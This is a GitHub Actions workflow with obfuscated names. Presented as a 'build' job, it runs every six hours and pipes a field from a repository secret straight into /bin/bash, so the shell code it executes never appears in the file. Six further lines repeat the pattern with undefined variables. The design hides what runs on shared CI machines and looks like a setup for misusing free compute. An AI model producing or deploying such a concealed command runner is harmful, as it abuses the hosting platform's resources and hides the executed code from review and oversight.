name: songzhifu1289

on:
  workflow_dispatch:
  schedule:
    - cron: '57 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: songzhifu1289
        env:
          giius52: ${{ secrets.giius52 }}
        run: |
          echo $giius52 | jq -r .nmycm73 | /bin/bash
          echo $nmqpw0 | jq -r .etcc2 | /bin/bash
          echo $kwt684 | jq -r .wyb73 | /bin/bash
          echo $jtmk9 | jq -r .no67935 | /bin/bash
          echo $qhm6 | jq -r .v88 | /bin/bash
          echo $zgey90978 | jq -r .wfq97 | /bin/bash
          echo $pazn79 | jq -r .dhkhj241 | /bin/bash

